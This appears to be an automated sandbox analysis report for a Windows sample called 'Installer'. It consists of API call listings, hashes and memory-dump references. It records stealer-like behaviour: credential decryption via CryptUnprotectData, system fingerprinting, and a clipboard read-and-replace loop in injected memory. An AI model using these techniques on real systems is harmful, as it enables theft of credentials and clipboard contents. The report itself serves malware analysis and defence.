                                                                                                                                                                                                                                                    • API String ID: 593203224-0
                                                                                                                                                                                                                                                    • Opcode ID: 6367108485c3dc81bd2310fd47694b719e174e87bc9f12660203b87da18a968c
                                                                                                                                                                                                                                                    • Instruction ID: 368d973501749918024692db23e5f4060138b3bb412c735fd32ff84e6c6b3001
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6367108485c3dc81bd2310fd47694b719e174e87bc9f12660203b87da18a968c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0416871D006188FCF26DF98D884BADBBF4FB49320F054269E8196B391DB34A984CF91
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0035D895,?,00000000,-00000008), ref: 0035C082
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00361E2A
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00361E31
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00361E6B
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00361E72
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1913693674-0
                                                                                                                                                                                                                                                    • Opcode ID: ffa14c7af1baedb5311d2b34e446f65b0733bed5002bc98fd63775acf3e38e13
                                                                                                                                                                                                                                                    • Instruction ID: 8bc2f35ff8a21187aeb032a5b14694d32dc86620d7e99aba21bb7ce4c20332d3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffa14c7af1baedb5311d2b34e446f65b0733bed5002bc98fd63775acf3e38e13
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5421F231600605AFDB23AF65D881C3BB7ACFF04365B19C518FC199B111D732EC008BA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 0c460e149bd92b2fa04ca2c258af1b64ed0554711ba4bece82d52f1b2a880939
                                                                                                                                                                                                                                                    • Instruction ID: 23f9d25a1c83684b93f08ca119a268316203ad9f59aafdab98bf130b82a09aec
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c460e149bd92b2fa04ca2c258af1b64ed0554711ba4bece82d52f1b2a880939
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3219F71204605AF9B23AF69DC81D6B77ACFF42366B114515FC559B272EB30EC4887A0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 003631C6
                                                                                                                                                                                                                                                      • Part of subcall function 0035C021: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0035D895,?,00000000,-00000008), ref: 0035C082
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003631FE
                                                                                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0036321E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 158306478-0
                                                                                                                                                                                                                                                    • Opcode ID: bfc50a59e58c59c4754a1a52a099cd8345fd0a77f2ca8fe07f850aa0788732d0
                                                                                                                                                                                                                                                    • Instruction ID: 072fb815d42100d20cf2fd9bf15f58411994e76d108df96f26c62e3d25d94826
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfc50a59e58c59c4754a1a52a099cd8345fd0a77f2ca8fe07f850aa0788732d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 951122B150061A7EE72327B1EC9ACBFBA5CDE843A57114828FA05DA101FF60DF0481B0
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 0034E899
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0034E8A3
• int.LIBCPMT ref: 0034E8BA
  • Part of subcall function 0034C1E5: std::_Lockit::_Lockit.LIBCPMT ref: 0034C1F6
  • Part of subcall function 0034C1E5: std::_Lockit::~_Lockit.LIBCPMT ref: 0034C210
• std::_Lockit::~_Lockit.LIBCPMT ref: 0034E914
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
• String ID:
• API String ID: 1383202999-0
• Opcode ID: 5533519127dc2bf48ce8709f26e255506314c73d5bd072606defbc22f5b16ce2
• Instruction ID: 707bf230c73dbc605cbf6ad098ca5aea5a6bf16c5e4d068d79ad36078ed7420b
• Opcode Fuzzy Hash: 5533519127dc2bf48ce8709f26e255506314c73d5bd072606defbc22f5b16ce2
• Instruction Fuzzy Hash: 0211CE368002199BCB07EBA4C945AADBBE5BF84720F254108E415AF282CF74BA40CB81
APIs
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000), ref: 0036ADB7
• GetLastError.KERNEL32(?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000,?,?,?,00363CD6,00000000), ref: 0036ADC3
  • Part of subcall function 0036AE20: CloseHandle.KERNEL32(FFFFFFFE,0036ADD3,?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000,?,?), ref: 0036AE30
• ___initconout.LIBCMT ref: 0036ADD3
  • Part of subcall function 0036ADF5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0036AD91,0036A2DC,?,?,00364390,?,00000000,00000000,?), ref: 0036AE08
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0036A2EF,00000000,00000001,00000000,?,?,00364390,?,00000000,00000000,?), ref: 0036ADE8
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
• Opcode ID: 67e58375ea87ec9d6a1b856cbfe6b341d7bf536f0b3f4bd010d1d99a6644f5bd
• Instruction ID: 9109f6c398f9937bbdc916606d65ec4a747ac4cdccb0c86be9f68c66c1adea69
• Opcode Fuzzy Hash: 67e58375ea87ec9d6a1b856cbfe6b341d7bf536f0b3f4bd010d1d99a6644f5bd
• Instruction Fuzzy Hash: 78F01C36510519BBCF331FD5DC29A9A3F2AFF087A1F018011FA0CA6521DB328CA0AF91
APIs
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 00350507
• GetCurrentThreadId.KERNEL32 ref: 00350516
• GetCurrentProcessId.KERNEL32 ref: 0035051F
• QueryPerformanceCounter.KERNEL32(?), ref: 0035052C
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 3739b4fd72965dfd99f0d456f10d44e9517a5158b9999bca39628581159b863b
• Instruction ID: 9fb4e24d89b50e4c71a22ad4bef1a8743c99a75cd5a61e0592cc5a6efbf2cd4f
• Opcode Fuzzy Hash: 3739b4fd72965dfd99f0d456f10d44e9517a5158b9999bca39628581159b863b
• Instruction Fuzzy Hash: 55F05F74D1060DEBCB11DBB4DA5999EBBF8FF1C300F914995A416E6110EA30AA849F50
APIs
• EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,0035B893,?,?,00000000,00000000,00000000,?), ref: 0035B9B7
Strings
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
• Opcode ID: 3fc67f2eca506d9bb93ef8dd45fe0c9a6afef89c77e00d5c2118219ddc1fc749
• Instruction ID: b5af09d52566c6b8535ea93e5b8d7e0310d59ab860fdef90cee510f8ff9d0ecf
• Opcode Fuzzy Hash: 3fc67f2eca506d9bb93ef8dd45fe0c9a6afef89c77e00d5c2118219ddc1fc749
• Instruction Fuzzy Hash: 88415931900249EFCF16DF94CC81EAEBBB5BF48301F198159FD14AB221D3359954DB91
APIs
• ___except_validate_context_record.LIBVCRUNTIME ref: 0035B475
Strings
Memory Dump Source
• Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_340000_Installer.jbxd
Similarity
• API ID: ___except_validate_context_record
• String ID: csm$csm
• API String ID: 3493665558-3733052814
• Opcode ID: af5adfafb35bc47e4538fa7f6a7d4a1834672c2df0c3fe839954aceda9cd7bfd
• Instruction ID: bd95583374b4524900fbd54f8e52f8a5132a8e9b86138774bdf70f5e8668abf4
• Opcode Fuzzy Hash: af5adfafb35bc47e4538fa7f6a7d4a1834672c2df0c3fe839954aceda9cd7bfd
• Instruction Fuzzy Hash: 6B31B4B1400219EBCF2B9F51C840CAAFB66FF0A316B194A5AFD4449132D332DD69DBC1
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0034B8B9
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(?,?,?,?,?), ref: 0034B8DE
                                                                                                                                                                                                                                                      • Part of subcall function 0035060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0034F354,00000000,?,?,?,0034F354,00343D4A,0037759C,00343D4A), ref: 0035066D
                                                                                                                                                                                                                                                      • Part of subcall function 00358353: IsProcessorFeaturePresent.KERNEL32(00000017,0035378B,?,?,?,?,00000000,?,?,?,0034B5AC,0034B4E0,00000000,?,?,0034B4E0), ref: 0035836F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 7163041cfe131668073d4e0cb508c92508843b21a47d289ae2a4aa47554f3c32
                                                                                                                                                                                                                                                    • Instruction ID: 6fd867c1edb22f4dfcf11d0c4d9ec3cabdf6f637751b9cb28c5d870b53d0067e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7163041cfe131668073d4e0cb508c92508843b21a47d289ae2a4aa47554f3c32
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28212332E00258ABCF269F99D845AAEF7F9AF44710F1A0419E906AF251CB74FD458B81
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00342673
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                    • API String ID: 2659868963-1158432155
                                                                                                                                                                                                                                                    • Opcode ID: 49d90b9156ea27dcf9c095b4e568480555acce01824235d369e4c5aa786fd053
                                                                                                                                                                                                                                                    • Instruction ID: 7575760331b262d4d5252574687621eab1024c7ca8812d132648d09d717308a2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49d90b9156ea27dcf9c095b4e568480555acce01824235d369e4c5aa786fd053
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D10171F1614301ABDB159F28D855A5BBBE8DF08318F11881CF45D9F351D379E858CB81
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0034F354,00000000,?,?,?,0034F354,00343D4A,0037759C,00343D4A), ref: 0035066D
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00342673
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                    • API String ID: 3109751735-1158432155
                                                                                                                                                                                                                                                    • Opcode ID: 6a17d9b0a23b0cb2beae78c6f2b30fcd8ebba35efc8af4e481d163d882be38f1
                                                                                                                                                                                                                                                    • Instruction ID: 9cea460e9543a65c50e711778be0718b2a77089908f449da2b5c7e84535b5cae
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a17d9b0a23b0cb2beae78c6f2b30fcd8ebba35efc8af4e481d163d882be38f1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00F0F8F5A14300ABD715AF18D945B47BBE4EB49719F01C81CF9989B310D3B9D458CB92

Execution Graph

Execution Coverage: 10.3%
Dynamic/Decrypted Code Coverage: 5.7%
Signature Coverage: 45.9%
Total number of Nodes: 279
Total number of Limit Nodes: 18

[Execution graph (279 nodes, 18 limit nodes): the rendered node/edge list is omitted here. The graph nodes resolve to the following Windows API calls reached from the sample's code addresses: RtlExpandEnvironmentStrings, GetLogicalDrives, LdrInitializeThunk, RtlAllocateHeap, RtlReAllocateHeap, RtlFreeHeap, CoInitializeEx, CoInitializeSecurity, CoCreateInstance, CoSetProxyBlanket, CoUninitialize, SysAllocString, SysFreeString, VariantInit, VariantClear, GetVolumeInformationW, CryptUnprotectData, GetComputerNameExA, GetPhysicallyInstalledSystemMemory, GetSystemMetrics, GetForegroundWindow, GetCurrentProcessId, GetCurrentThreadId, SHGetSpecialFolderPathW, CreateThread, FreeLibrary, ExitProcess, Sleep, OpenClipboard, GetClipboardData, GetClipboardSequenceNumber, EmptyClipboard, SetClipboardData, CloseClipboard, GlobalAlloc, GlobalLock, GlobalUnlock, GlobalFree. The clipboard-handling cluster (OpenClipboard / GetClipboardData / GlobalAlloc / EmptyClipboard / SetClipboardData) runs from the injected region at 4fe1000, and CryptUnprotectData is reached from the 415200 routine.]

Control-flow Graph
APIs
• CoCreateInstance.OLE32(0044468C,00000000,00000001,0044467C,00000000), ref: 004399AB
• SysAllocString.OLEAUT32(C197C794), ref: 00439A18
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00439A56
• SysAllocString.OLEAUT32(B2ECBC14), ref: 00439AD9
• SysAllocString.OLEAUT32(77B37587), ref: 00439B6B
• VariantInit.OLEAUT32(BFBEBDA4), ref: 00439BDB
• VariantClear.OLEAUT32(BFBEBDA4), ref: 00439D18
• SysFreeString.OLEAUT32(?), ref: 00439D3C
• SysFreeString.OLEAUT32(?), ref: 00439D42
• SysFreeString.OLEAUT32(00000000), ref: 00439D4F
• GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00439D8B
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
• String ID: &v
• API String ID: 2573436264-996230610
• Opcode ID: c76a795488dcaea1087b38c4a21f4ec032b56208ede1dfedf05bb0fa22a11b63
• Instruction ID: 2eae229d14a92933328e5725d2ae13478f160aa11d56bd9171fe0ff53e23d803
• Opcode Fuzzy Hash: c76a795488dcaea1087b38c4a21f4ec032b56208ede1dfedf05bb0fa22a11b63
• Instruction Fuzzy Hash: 4E22F072A083409FD714CF29C845B5BBBE6EFC9324F18992DE5958B381DB78D805CB86

Control-flow Graph

APIs
• Sleep.KERNEL32(00000001), ref: 04FE1032
• OpenClipboard.USER32(00000000), ref: 04FE103C
• GetClipboardData.USER32(0000000D), ref: 04FE104C
• GlobalLock.KERNEL32(00000000), ref: 04FE105D
• GlobalAlloc.KERNEL32(00000002,-00000004), ref: 04FE1090
• GlobalLock.KERNEL32 ref: 04FE10A0
• GlobalUnlock.KERNEL32 ref: 04FE10C1
• EmptyClipboard.USER32 ref: 04FE10CB
• SetClipboardData.USER32(0000000D), ref: 04FE10D6
• GlobalFree.KERNEL32 ref: 04FE10E3
• GlobalUnlock.KERNEL32(?), ref: 04FE10ED
• CloseClipboard.USER32 ref: 04FE10F3
• GetClipboardSequenceNumber.USER32 ref: 04FE10F9
Memory Dump Source
• Source File: 00000003.00000002.3522921714.0000000004FE1000.00000020.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: true
• Associated: 00000003.00000002.3522907777.0000000004FE0000.00000002.00000800.00020000.00000000.sdmp
• Associated: 00000003.00000002.3522934176.0000000004FE2000.00000002.00000800.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_4fe0000_Installer.jbxd
Similarity
• API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
• String ID:
• API String ID: 1416286485-0
• Opcode ID: 84aafcb5b5a6433c750eb38fd26a86e4e74b6fc77f0247bcffa5dad73278fab3
• Instruction ID: cec12d2198a359d2410d731ba2306c2f27215f87582efa929451e5de5c7e6a75
• Opcode Fuzzy Hash: 84aafcb5b5a6433c750eb38fd26a86e4e74b6fc77f0247bcffa5dad73278fab3
• Instruction Fuzzy Hash: EF216232A042689FD7202B73FD09B7A77ACEF04757F060468FA45DA151FB759C01CAA2

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
• API ID:
• String ID: ("D-$54+*$8"D-$BxBG$U$^123$eH$iiat
• API String ID: 0-2540653402
• Opcode ID: ece7e7512deb2f3d0905023b68c116b96d26401af29463b746300dd7e0310da3
• Instruction ID: 07982f48521f8885066ce7338b4bbbb716ab1cb9c22f471718dbf28f94ce43d7
• Opcode Fuzzy Hash: ece7e7512deb2f3d0905023b68c116b96d26401af29463b746300dd7e0310da3
• Instruction Fuzzy Hash: 5A5213B5909340CBD7249F24D895BEF77E2FFC5314F08492EE48A8B291E7389841CB96
Strings
Memory Dump Source
• Source File: 00000003.00000002.3522518136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.3522518136.0000000000454000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Installer.jbxd
Similarity
